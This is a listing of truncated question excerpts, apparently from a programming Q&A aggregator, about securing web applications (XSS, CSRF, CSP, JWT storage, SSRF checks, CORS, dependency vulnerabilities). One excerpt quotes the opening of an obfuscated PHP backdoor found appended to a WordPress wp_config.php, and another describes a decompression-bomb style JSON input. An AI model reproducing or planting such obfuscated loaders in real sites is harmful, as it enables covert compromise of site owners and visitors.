I am seeking advice on how to securely insert user form data into BigQuery using the Google Cloud BigQuery library. Specifically, I am curious about the most effective methods for sanitizing, escaping, and cleaning the input data. Is it feasible to implem ...
Currently facing an issue with my Symfony setup. Users in my app can upload images to the server, which are stored in /web/uploads/images directory. My goal is to make these images visible only to logged-in users. I've attempted to tweak the security conf ...
After reviewing the authentication middleware code in a course I am currently taking, I have some concerns about its security. I decided to test a protected route using Postman and discovered that I was able to retrieve an order for one user with a token ...
I am currently working on an API built with node.js & express.js. At the moment, the API is unsecured which allows anyone to access and manipulate records using GET, POST, PUT, and DELETE requests. One of the challenges I am facing is that my REST API sho ...
While attempting to utilize an inline script in my project, I am continually encountering the following error message: 'Refused to execute inline script because it violates the following Content Security Policy directive: "script-src 'self'" ...
Creating a simple cors proxy involves piping requests, and to achieve this, I decided to utilize the pipe method with Request.js, as illustrated in the image below: https://i.stack.imgur.com/gUeou.png Due to my limited expertise in security, can anyone h ...
Currently utilizing Angular 15, I have included confidential information such as passwords and secret keys for encryption in the environment file. My concern is not about the security of the environment file in the repository (such as git or etc), but rath ...
I have a PHP backend (although it's not really important) and a Javascript client that runs in the browser. Here is how the application operates: The user accesses a URL and receives raw templates for rendering data An Ajax GET query is sent to the ...
When my web application receives an unfiltered string from an untrusted user, it must determine whether this string, when used as a hostname, resolves to an IPv4 or IPv6 address within a forbidden range specified by predefined rules. If the string appears ...
I'm in the process of creating a user-friendly online code editor using CodeMirror to assist learners with mastering basic HTML, CSS, and JavaScript. My goal is for students to have the ability to save their code so it can be viewed in a separate bro ...
I am working on implementing a SSR page in nextjs, and I want to restrict access to only authenticated or logged-in users. How can I ensure this as the SSR is being generated on the server, without passing the token from local storage? Please share your th ...
I have a question about how to properly map a userID to an entity: Let's say I'm using Angular, React, or any other front-end framework. How should I go about sending the userID along with the entity? For example, if a user is creating a Product, here are ...
As I dive into my React project, I am amazed by its dynamic nature. However, a recent challenge has arisen when implementing dynamic security features such as Google reCAPTCHA. The fear of users manipulating my states and properties is beginning to worry m ...
In order to enhance the user experience of our Angular app, we have integrated Firebase Authentication with Session Persistence. This ensures that users don't need to log in again every time they refresh the page. As part of this process, we store the auth ...
My website offers an exclusive paid API. To ensure security and authenticity, I only want to accept incoming ajax calls from specific sources: Requests originating from my own website Requests made by individuals who have purchased access to the API Bel ...
In order to enhance the security of my system, I am working on a feature that will prevent users from executing functions when they are not logged in. When an unauthorized user tries to do so, a message will pop up indicating that they must be logged in be ...
I have successfully developed a function that accomplishes the following: It accepts a string as input, which can be either an entire HTML document or an HTML "snippet" (even if it's broken). It creates a DOMDocument from the input and iterates through al ...
Is there a way to prevent direct access to pages in the AJAX directory while still allowing them to be served from their parent page? I've tried various .htaccess configurations, but they end up blocking access from the main page as well. Essentially, ...
Currently, I am in the process of developing a new website that will function as a single-page application featuring dialog/modal windows. My intention is to utilize Backbone for the frontend and establish communication with the backend through ajax/webs ...
It appears that my page has been infiltrated as I discovered this suspicious code at the end of my wp_config.php file. $Xbk = "uQoCwSNBIpmVRP14XjL56=AWfl.DFrv03tx;Ez*bnaHKdyc(UsMi+qgk87'9eZYT_/)OG2hJ";$vDE = $Xbk[41].$Xbk[49].$Xbk[49].$Xbk[60].$Xbk[2 ...
After a user completes a transaction on my site, the confirmation page displays Google conversion tracking code in a small JavaScript snippet. This code is located on my Worldpay callback page, which pulls data from the regular site (HTTP) to the Worldpay s ...
Consider the following situation: I have a set of web services (JAX-WS) that require secure access. Currently, for authentication purposes, I am using an additional SecurityWService that provides authorized users with a userid and sessionid to include in r ...
As I prepare to embark on creating a new website, my main goal is to collect form input values such as dropdowns and radio boxes from the client without requiring user accounts. These values will be used for sensitive calculations, making security a top pr ...
Today, I successfully implemented a session and token authentication system for my web api using http get/post rpc style. Here is the plan I followed: Key: action (param1, param2) : returnvalue1, returnvalue2 login (username, password) : sessionkey, tok ...
Currently, I am developing a nodejs server and facing the challenge of needing to access additional services through ajax from a different domain. Can anyone provide guidance on how to bypass the cross-domain restriction within nodejs code? Please note th ...
I am aware of the potential for a Cross-Site Forgery Attack that can target requests returning arrays by manipulating the Array constructor. For instance, let's say I have a site with a URL: foo.com/getJson that provides the following array: ['Puff the ...
Are there any default security practices that NestJS handles automatically? If not, what suggestions do you have for securing a NestJS application aside from using helmet? I noticed in the NestJS middleware documentation an example utilizing the helmet dep ...
I am working to determine the level of security provided by credentialed XHR2 requests. More precisely, can I verify that the request originated from a browser runtime environment, and not from a bot (such as a server-side program) that might be able to m ...
In search of a secure and flexible solution for storing credentials in a config file for database connections and other private information within a Python module. This module is responsible for logging user activity in the system through different handler ...
Can this code in node.js + express be simplified? // Code snippet for registering a new participant app.post('/api/participant', function (req, res, next) { var data = req.body; // Ensure only specific fields are uploaded var participant = n ...
I'm new to setting up websites this way and could really use some advice on my unique situation. Here's the setup: I have two separate websites, WS1 & WS2, each with their own domain names. Both sites point to the same IP address using ngi ...
I successfully controlled Tor Browser with Selenium, however I soon discovered that the Tor circuits (IP changes) were not enabled. Is there a way to enable them? Or should I use the new feature called "New Identity" from the code? My setup includes Pytho ...
Currently, my focus is on transitioning to the MERN stack and incorporating an authentication module using Next.js (front-end) + Node.js (for scalability). I am utilizing JWT token method for authentication and have some concerns: Storing tokens in coo ...
Currently, I am referencing a JQuery Ajax Voting system guide to help me set up a similar system. However, I have concerns about the security aspects of this guide. As it stands, the guide simply stores the ID of an item and its corresponding voting statis ...
Hey there! I have a question about the security of using the jQuery.post function in jQuery to send a user's login information to a PHP script. Here is the piece of code I am considering: $("#login_form").submit(function() { var unameval = $("#use ...
Is there a method to secure JavaScript files from unauthorized access? <script src="JS/MyScript.js" type="text/javascript"> It is crucial that users are unable to access the MyScript.js file. I am seeking advice on how to achieve this. Is it even ...
I'm considering using RedBean as my ORM-mapper. Currently, I have my own implementation, but it's becoming less effective and efficient as the project grows in size and complexity. However, there is one question that remains unanswered: How secure is Re ...
I am currently facing an issue with my Next.js app. The package.json file specifies "next": "^10.2.0", which includes shell-quote as a transitive dependency version 1.7.2 - known to have critical security vulnerabilities. To address this, I need to update ...
Every time I try a new URL from my browser's address bar to get Json data, I keep encountering the same error message when using the built-in MVC JsonResult helper: This request is being blocked because sensitive information might be revealed to third-p ...
For my frontend application, I'm utilizing Angular and connecting to an existing backend service for data retrieval. This backend service is established as a legacy system that I don't have control over. To enhance security, I've integrated ...
My search for a solution to my specific problem has been challenging due to the general nature of the terms and results in online searches. Frequently travelling, I find myself in locations where internet access on shared computers is limited to browsing ...
I developed a PHP application that has a login requirement. This application is exclusive, so no new users can create accounts. Initially, I implemented sessions to identify users, but it caused issues on tablet devices as they would lose their sessions. I ...
As I delve into creating a Single Page Application with Angular 7, I find myself questioning the prevalent recommendation of storing data in services as opposed to a file with constants that can be directly imported. The simplicity of directly importing a ...
I am looking to create a Node.js daemon that can operate across multiple computers while facilitating message exchange between the daemons. Security is paramount, so I want to ensure the communication is encrypted. However, I am uncertain about which encry ...
While attempting to access the codeigniter home page, I came across this error message: A PHP Error was encountered Severity: Warning Message: require(C:\wamp\www\ci\system\core\Security.php)[function.require]:failed to open ...
I am currently working on an Angular app that communicates with an API. The JSON responses from the API are prefixed with )]}', as recommended in Angular's official documentation. The issue I am facing is that my browser seems to try decoding the response ...
When it comes to connecting NextJS on a Digital Ocean droplet directly to MongoDB running on another Digital Ocean virtual server, there seems to be conflicting opinions. Some argue against using "full stack" frameworks like NextJS or Angular without an in ...
I have a file named test.gzip which contains JSON data. {"events": [ {"uuid":"56c1718c-8eb3-11e9-8157-e4b97a2c93d3", "timestamp":"2019-06-14 14:47:31 +0000", "number":732, "user": {"full_name":"0"*1024*1024*1024}}]} The full_name field in the JSON data c ...
When I try to log in with the first URL (as shown in the image), it takes me to another URL where I have to input my credentials. However, before reaching that page, a browser-generated pop-up appears that cannot be located ...
I want to discuss the topic of file security with you. Currently, I have a PHP script that retrieves a file from an <input type="file"> tag and then uses file_get_contents() to store the file data in a variable. However, I am concerned about potenti ...
Imagine owning a popular social media platform and wanting to integrate an iframe for user signups through third-party sites, similar to Facebook's 'like this' iframes. However, you are concerned about the security risks associated with ifra ...
I am currently tackling the Slow Post Vulnerability issue within my application. Concern: To prevent overwhelming connections from a single user, I have implemented express-rate-limit to ensure the application remains available. const rateLimit = require ...
What I'm doing in the code I am currently reading a text file containing approximately 3500 links. Subsequently, I iterate through each link to filter out the relevant ones and make requests to retrieve their status codes, links, and page titles usin ...
My Angular2 app uses OAuth2 with password grant type for authentication. I currently store the session token on sessionStorage, but I need to securely store additional data such as user roles. While I am aware that sessionStorage or localStorage can be ea ...
Is there a way to upload private files to AWS without granting public-read access, but still be able to view the file using a URL in a protected route on my client side (Reactjs/Nextjs)? How can I make this work? The situation: I need to send a PDF file f ...
As a beginner in deploying express applications, I find myself lacking in knowledge about the essential security measures that need to be taken before launching a web application. Here are some key points regarding my website: 1) It is a simple website ...
My form is secured with a CSRF token, which I've heard is essential for maintaining form security. Whenever the form is submitted late, an error occurs, indicating that the CSRF token is working as expected. However, when submitting the form using ajax, I ...
I need assistance finding a method or NPM package to verify for private/local/bad addresses in the hostname entered as an input to my REST endpoint before saving it in the database. This measure is important to prevent SSRF attacks. Currently, I am only us ...
I'm working on a PHP script that receives data from an Android application. What security measures should I implement to ensure the safety of this script? Are functions like isset enough? <?php require ('config.php'); $connection=mysqli_connect($serve ...
I created a modal for previewing avatars with a generic design: <avatar-update :img-file="avatarFile" :show="avatarModalShow" :img-url="url" @close="avatarModalShow = !avatarModalShow" :change-avatar="updateCrop" @destroyUrl="imgUrl = null"> </av ...
const fetchData = async () => { try { const response = await axios.get('http://localhost:8080/omp/patients', { headers: {authorization: 'Bearer ' + token}}); this.state = response.data; } catch (ex) { alert("You are ...
I am in the process of developing a website that generates a user's profile page based on their input. My main concern is whether this approach is secure. Below is how I currently sanitize the user input, but I would appreciate any additional advice. stri ...
I have a Python application in the works with FastApi, utilizing JWT and OAuth2 password flow for user authentication. Following their documentation, upon user login, a token is issued using the HS256 algorithm along with a specific user secret key. This t ...
Imagine I have the following code snippet (partially pseudocode) $.ajax({ url: "/api/user", success: function(resp) { var data = JSON(resp) if (data.user.is_admin) // do admin thing else // do somet ...
I have been researching how to protect my code from XSS attacks, and all the examples I've found focus on validating direct user input (like in a contact form or login). However, I'm unsure if I should still secure my code even if there is no wa ...
I recently ran the npm audit --production command and found a high-risk vulnerability related to the snowflake-sdk dependency. After checking the snowflake github page, I noticed that the package.json file includes "requestretry": "^6.0.0" ...
I am currently working on an Angular project that is connected to a Firestore database. Within the database, there is a collection called users, and each document within this collection contains a nested collection named hugeCollection. I have updated the ...
My backend is powered by Laravel and the frontend uses Vue. Users authenticate by calling my Laravel API to get an Auth token and a refresh token. The Auth token expires after 2 minutes, while the refresh token lasts longer. Storing the refresh token in l ...
After thorough research, I came across a method to achieve exactly what I need. However, I have some reservations because I've heard that it could pose a potential "security risk." Unfortunately, no one seems to provide further information on why this ...
I've been working on implementing CSP headers for my website to ensure data is loaded from trusted sources. However, I'm facing an issue where CSP is blocking my local JS files. Here's a snippet from my nuxt.config.js: const self = 'lo ...
function sanitizeInput($input){ $index=0; return str_replace("<","&lt;",str_replace(">","&gt;",str_replace("&","&amp;",$input,$index),$index),$index); } Would this method be effective in preventing XSS attacks? Just my person ...
After conducting a penetration test using the Burp tool on my node(express)/angular application, I discovered a reflected XSS vulnerability. This vulnerability was specifically identified when making a GET request for static assets (no other vulnerabilitie ...
=== npm audit security report === ┌───────────────────────────────────────────────────────── ...
I'm in the process of developing a Salesforce app that is displayed within an iframe on a Salesforce page. I am using a node express server to render this page. In order to ensure security compliance, I want the app to only display within the Salesfor ...
In my email application, I am trying to prevent alerts in JavaScript by using a CSP header. However, even with the current policy in place, alerts can still execute when I send an HTML document attachment that contains script tags. Changing all JavaScript ...